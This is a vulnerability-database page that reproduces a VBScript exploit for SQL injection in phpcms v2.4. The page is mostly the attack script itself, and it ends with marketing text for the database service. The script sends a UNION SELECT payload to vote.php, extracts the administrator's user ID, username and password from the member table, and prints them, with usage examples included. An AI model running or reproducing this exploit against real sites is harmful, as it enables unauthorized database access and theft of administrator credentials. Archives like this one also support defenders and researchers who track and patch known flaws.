Vulners
Lucene search
phpcms v2.4 SQL injection exploit
1.vbs
-------------------------------------------------------------------
on error resume next
Set objArgs = WScript.Arguments
dim my_http
dim my_path
dim fjhgx
print_r()
if objArgs.length = 0 then
quit_print()
End if
if objArgs(0) = null then
quit_print()
Else
my_http = objArgs(0)
End if
if objArgs(1) = null then
quit_print()
Else
my_path = objArgs(1)
End if
Set Http = CreateObject("Microsoft.XMLHTTP")
Http.Open "get","http://"&my_http&my_path&"vote.php?action=result&voteid=999999.9+UNION+ALL+SELECT+(Select concat(0x7e,0x27,userid,0x27,username,0x27,password,0x7e,0x27) FROM phpcms_member where adminid=1 limit 0,1)+,12,12,12,12,12,12,12,12,12,12,12,12--",False
Http.Send
fjhgx = Zhuanhuan(Http.responsebody)
Set Http = Nothing
if InStr(fjhgx, "voteid=~'") Then
Else
WScript.Echo "Exploit failed..."
wscript.quit '退出
End If
fjhgx = RegExpTest("WHERE voteid=~'.*~' ",fjhgx)
fjhgx = Replace(fjhgx,"WHERE voteid=~'","")
fjhgx = Replace(fjhgx,"~' ","")
dim fjhgx_b
fjhgx_b = Split(fjhgx,"'")
WScript.Echo " * [+] UserID : " & fjhgx_b(0)
WScript.Echo " * [+] Username : " & fjhgx_b(1)
WScript.Echo " * [+] Password : " & fjhgx_b(2)
Function print_r()
WScript.Echo "+---------------------------------------------------------------------------+"
WScript.Echo " phpcms v2.4 SQL injection exploit"
WScript.Echo " test: Fjhgx 俺是农村的"
WScript.Echo " mail: <a href="[email protected]</a'>mailto:[email protected]">[email protected]</a>"
WScript.Echo " team: <a href="http://www.wolvez.org" target="_blank">http://www.wolvez.org</a>"
WScript.Echo "+---------------------------------------------------------------------------+"
End Function
Function quit_print()
WScript.Echo " Usage: CScript 1.vbs Url [Pre]"
WScript.Echo " Example:"
WScript.Echo " CScript 1.vbs localhost /"
WScript.Echo " CScript 1.vbs localhost /phpcms_v2.4/"
wscript.quit '退出
End Function
'创建转换函数用以转换编码
Function Zhuanhuan(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
Zhuanhuan = strReturn
End Function
Function RegExpTest(patrn, strng)
Dim regEx, Match, Matches ' 建立变量。
Set regEx = New RegExp ' 建立正则表达式。
regEx.Pattern = patrn ' 设置模式。
regEx.IgnoreCase = True ' 设置是否区分字符大小写。
regEx.Global = True ' 设置全局可用性。
Set Matches = regEx.Execute(strng) ' 执行搜索。
For Each Match in Matches ' 遍历匹配集合。
'RetStr = RetStr & "Match found at position "
'RetStr = RetStr & Match.FirstIndex & ". Match Value is '"
RetStr = RetStr & Match.Value & vbCRLF
Next
RegExpTest = RetStr
End Function
--------------------------------------------------------------------------------------------
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jun 2011 00:00Current
7.1High risk
Vulners AI Score7.1